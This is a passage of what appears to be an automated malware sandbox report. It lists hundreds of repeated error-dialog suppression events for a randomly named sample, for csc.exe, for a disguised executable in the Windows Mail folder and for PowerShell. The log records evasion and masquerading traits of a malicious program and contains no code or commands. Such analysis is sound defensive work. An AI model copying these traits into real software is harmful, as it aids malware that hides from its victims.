                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
